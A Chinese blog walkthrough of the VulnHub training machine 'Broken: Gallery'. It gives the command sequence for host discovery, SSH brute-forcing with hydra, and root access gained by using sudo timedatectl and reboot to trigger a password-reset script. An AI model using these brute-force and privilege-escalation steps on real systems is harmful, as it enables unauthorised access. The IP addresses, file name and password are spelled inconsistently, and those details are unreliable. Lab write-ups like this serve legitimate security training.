漏洞复现 -- Broken: Gallery

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量145 收藏
点赞数 3
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/140062620
版权

一、靶机地址

https://www.vulnhub.com/entry/broken-gallery,344/

二、漏洞复现

kali : 192.168.159.128
靶机 : 192.168.159.145
sudo arp-scan -l
 # 探测⽬标主机

nmap -A 192.168.159.146
 # 对于扫出的IP地址进⾏端⼝扫描

dirsearch -u http://192.168.159.146
 # 对开放的80端⼝进⾏了探测,发现没有太⼤利⽤价值,只能把注意⼒转向22端⼝,尝试对22端⼝的ssh进⾏爆破

hydra -L rockyou.txt -P rockyou.txt 192.168.159.146 ssh
 # 成功爆破出账号密码
broken | broken

ssh broken@192.168.159.146
 # 远程连接ssh,成功登录

sudo -l
 # 查看当前⽤户的sudo权限,发现能够使⽤timedatectl和 reboot命令

ls -la
 # 尝试查看bash⽤户历史命令, 发现⼀个关键⽂件paddwordpolicy.sh位于/etc/init.d/⽬录下 

cat .bash_history 

cat /etc/init.d/password-policy.sh

 # 可以发现DAYOFWEEK等于4的时候,设置root⽤户的密码为TodayIsAgoogDay,其中DAYOPWEEK=$(date "+%u"),表示当前星期⼏,也就是说星期四的执⾏root⽤户密码的修改,通过timedatectl修改时间后重启

sudo timedatectl set-time '2015-11-20 16:14:50'
 # 使用 timedatectl 命令以超级用户权限设置系统时间为2015年11月20日16时14分50秒。

sudo /sbin/reboot
 # 使用 reboot 命令以超级用户权限重启系统。

ssh broken@192.168.159.146
 # 用SSH协议连接到IP地址为192.168.159.146的服务器,登录用户为broken。

su root
 # 切换到root用户。

使⽤ssh重新连接,然后切换到root⽤户,密码为“TodaylsAgoodDay”,因此我们使⽤它作为root登录,成功获得root权限

冷酷小帅~0x7e
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
初识靶机_Broken——渗透day05
qq_62716256的博客
08-12 927
初识靶机_Broken——渗透day05
broken靶机(计划任务提权)
m0_66299232的博客
11-27 375
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
Cannot resolve plugin org.apache.maven.plugins:maven-compiler-plugin:3.1 Clean up the broken artifa
ls_wifi的博客
12-10 3452
言简意赅,话不多说,直接上图: 记录一次创建maven项目的时候出现的bug,我以前也配过maven并没有遇到过这种问题,这回重新下载就出现这个问题了。我maven刚开始下的是3.8.4版本的也就是目前的最新版本,然后就出现了如上问题,而且我觉得我环境变量和settings.xml的配置以及IDEA整合maven的配置都没问题的,我还照着网上的大多数教程去修改阿里云镜像、关闭内网连热点、等方式都没用。我还以为是版本问题,就降级成了3.6.3,还是不行,之后我换成了3.5.4就可以了,然后我很纳闷不应该是版
sudo apt-get install 报错 software-properties-common : Depends: python3:any (>= 3.3.2-2~)
Castlehe的博客
10-15 6888
1. 问题描述 想使用sudo add-apt-repository ppa:openjdk-r/ppa这个命令,但是提示没有add-apt-repository命令,股进行安装 add-apt-repository 命令是software-properties-common包的一部分,因此安装这个包就OK了。 但是一度报错。。。> sudo apt-get install software-properties-common Reading package lists... Done Build
Ubuntu报错software-properties-common : Depends: python3-software-properties
qq_34168515的博客
07-17 6284
错误信息 sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common Reading package lists… Done Building dependency tree Reading state information… Done apt-transport-https is already the newest version (1.6.12ubuntu0.1). ca-ce
MySQL--解决CommunicationsException: Communications link failure
热门推荐
IT利刃出鞘的博客
02-16 2万+
本文介绍Java中操作MySQL时一个报错的原因及解决方案。这个报错是:com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure
下列软件包有未满足的依赖关系: python-catkin-pkg : 依赖: python-catkin-pkg-modules (>= 0.5.2) 但是它将不会被安装
科技室的博客
09-05 6339
查问题
安装包失败提示apt --fix-broken install 笔记
曹太强的专栏
06-19 2565
安装失败 apt --fix-broken install
dpkg-deb: error: paste subprocess was killed by signal (Broken pipe)
wtlll的博客
11-07 6850
1.问题描述 打算在Ubuntu18.04上安装cuda10.2,出现以下错误 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/nvidia-cuda-dev_9.1.85-3ubuntu1_amd64.deb E: Sub-process /usr/bin/dpkg returne
Quickmetasploit---Old---Broken:加快metasploit
05-21
Quickmetasploit 在python 2.7上运行运行install.sh以安装依赖项和符号链接运行install.sh之后,可以通过在shell中键入quickmetasploit来运行脚本。 运行update.sh以更新脚本
svelte-kit-broken-endpoints:在SvelteKit中复制与Endintint有关的错误
05-03
复制与SvelteKit中的端点有关的错误。 尝试启动开发服务器,然后运行以下命令: curl --request POST \ ... --header ' content-type: application/json ' \ --data ' { ...} ' 关于这个问题 每当src/setup.js的prepare...
gh-action-check-broken-links:GitHub动作,检查是否存在断开的链接
05-02
用法示例- name : HashiCorp's Link Checker uses : hashicorp/gh-action-check-broken-links@v1 with : baseUrl : ' https://hashicorp.com ' files : ' pages/foo.mdx pages/bar.mdx ' whitelist : | ...
fps-broken-cert:证明问题的证明
05-29
标题“fps-broken-cert:证明问题的证明”和描述中的“fps破解证书”以及“证明问题的证明”都指向一个网络安全或编码相关的主题,特别是与证书安全和可能的漏洞相关。然而,由于提供的信息非常有限,没有具体的技术...
electron-webpack-react-router-dom-hooks-broken:这个简单的示例演示了在电子Webpack设置的上下文中使用react-router-dom钩子导致的钩子规则错误
03-19
电子Webpack快速启动 一个基本的最小项目结构,即可开始使用进行开发。 多亏了electron-webpack的强大功能,该模板才配备了... 使用进行开发 renderer和main流程的HMR 使用根据您的electron版本自动配置的 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1748
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
最新发布
lyingSeven的博客
08-03 609
设备安全
您也许需要运行“apt --fix-broken install”来修正上面的错误。 下列软件包有未满足的依赖关系: python3-rosdep-modules : 依赖: python3-rospkg-modules (>= 1.4.0) 但是它将不会被安装 依赖: python3-catkin-pkg-modules (>= 0.4.0) 但是它将不会被安装 python3-rosdistro-modules : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 依赖: python3-rospkg-modules 但是它将不会被安装 ros-noetic-rospack : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-noetic-rqt-gui : 依赖: python3-rospkg-modules 但是它将不会被安装 ros-noetic-rqt-robot-monitor : 依赖: python3-rospkg-modules 但是它将不会被安装 terminator : 依赖: python3-configobj 但是它将不会被安装 推荐: gir1.2-keybinder-3.0 但是它将不会被安装 E: 有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。
05-22
sudo apt --fix-broken install ``` 该命令会自动安装缺失的依赖关系,并且修复任何其他的错误。 如果该命令无法解决问题,你可以尝试手动安装缺失的依赖关系。针对上述错误提示中的每个软件包,都可以使用以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值